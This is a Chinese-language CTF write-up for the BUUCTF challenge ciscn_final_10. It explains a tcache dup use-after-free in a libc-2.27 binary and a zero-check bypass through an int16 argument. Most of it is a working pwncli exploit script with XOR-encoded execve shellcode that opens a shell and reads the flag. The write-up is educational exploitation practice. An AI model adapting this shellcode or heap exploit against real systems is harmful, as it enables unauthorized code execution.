标签:10 BUUCTF dele ciscn libc 0x20 add sendlineafter x00
目录ciscn_final_10
总结
一道简单的tcache dup
的题,前面需要绕过校验,注意一下函数的参数为int16
。最后把shellcode
处理一下即可。
checksec
版本为libc-2.27
,无tcache dup
检测。
漏洞点
判断是否为0
的函数的参数为int16
。
uaf
:
EXP
#!/usr/bin/python3
from pwncli import *
cli_script()
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
def add(size, data):
p.sendlineafter("> ", "1")
p.sendlineafter("> ", str(size))
p.sendafter("> ", data)
def dele():
p.sendlineafter("> ", "2")
p.sendafter("> ", "a")
p.sendlineafter("> ", str(-2147483648))
# add
add(0x20, 0x20*"a")
dele()
dele()
add(0x20, "\x90")
add(0x20, "a"*0x20)
add(0x20, "The cake is a lie!\x00")
p.sendlineafter("> ", "3")
payload = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05\x00\x00\x00\x00"
pl = [1]
ss = 1
for i in payload:
ss ^= i
pl.append(ss)
p.sendlineafter("> ", bytes(pl))
p.sendline("cat /flag")
p.interactive()
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli
标签:10,BUUCTF,dele,ciscn,libc,0x20,add,sendlineafter,x00 来源: https://www.cnblogs.com/LynneHuan/p/15452153.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。